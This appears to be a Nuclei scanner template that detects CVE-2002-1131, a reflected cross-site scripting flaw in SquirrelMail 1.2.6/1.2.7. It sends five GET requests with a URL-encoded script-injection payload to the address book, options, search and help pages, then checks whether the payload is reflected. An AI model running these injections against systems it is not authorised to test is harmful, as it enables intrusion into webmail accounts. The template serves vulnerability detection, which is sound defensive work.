58 lines
2.3 KiB
YAML
58 lines
2.3 KiB
YAML
id: CVE-2002-1131
|
|
|
|
info:
|
|
name: SquirrelMail 1.2.6/1.2.7 - Cross-Site Scripting
|
|
author: dhiyaneshDk
|
|
severity: high
|
|
description: The Virtual Keyboard plugin for SquirrelMail 1.2.6/1.2.7 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
|
remediation: |
|
|
Upgrade to a patched version of SquirrelMail or apply the necessary security patches to mitigate the XSS vulnerability.
|
|
reference:
|
|
- http://www.redhat.com/support/errata/RHSA-2002-204.html
|
|
- http://www.debian.org/security/2002/dsa-191
|
|
- http://sourceforge.net/project/shownotes.php?group_id=311&release_id=110774
|
|
- https://www.exploit-db.com/exploits/21811
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2002-1131
|
|
classification:
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2002-1131
|
|
cwe-id: CWE-80
|
|
epss-score: 0.06018
|
|
epss-percentile: 0.92693
|
|
cpe: cpe:2.3:a:squirrelmail:squirrelmail:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 5
|
|
vendor: squirrelmail
|
|
product: squirrelmail
|
|
tags: cve2002,edb,xss,squirrelmail,cve
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
|
- '{{BaseURL}}/src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
|
- '{{BaseURL}}/src/search.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&what=x&where=BODY&submit=Search'
|
|
- '{{BaseURL}}/src/search.php?mailbox=INBOX&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search'
|
|
- '{{BaseURL}}/src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
|
|
|
stop-at-first-match: true
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "</script><script>alert(document.domain)</script>"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4b0a00483046022100cb954f3e26bd622d314ab84e7246f1d602fa8d116d388181a1162945703291d5022100d964b7bf0b7c27a91ea09f5b22caf5287adfeb126ad139ff2a9a2bbeadf45874:922c64590222798bb761d5b6d8e72950
|